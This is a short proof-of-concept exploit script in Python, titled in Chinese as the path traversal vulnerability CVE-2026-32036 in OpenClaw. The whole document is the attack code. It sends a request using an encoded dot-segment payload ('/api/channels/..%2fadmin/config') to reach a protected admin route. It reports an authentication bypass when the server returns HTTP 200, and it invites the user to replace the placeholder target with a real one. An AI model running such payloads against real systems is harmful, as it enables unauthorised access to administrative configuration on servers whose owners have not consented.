CVE-2026-32036 OpenClaw路径遍历漏洞

import requests def check_vulnerability(target_url): # The payload uses encoded dot-segments to traverse paths # Example: accessing a protected route /api/admin via /api/channels/..%2fapi/admin payload_path = "/api/channels/..%2fadmin/config" full_url = f"{target_url}{payload_path}" headers = { "User-Agent": "CVE-2026-32036-Scanner" } try: response = requests.get(full_url, headers=headers, timeout=10) # Check if authentication was bypassed (e.g., HTTP 200 instead of 401/403) if response.status_code == 200: print("[+] Vulnerability Confirmed: Authentication bypassed!") print(f"[+] Response content length: {len(response.text)}") return True else: print(f"[-] Target returned status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target check_vulnerability(target)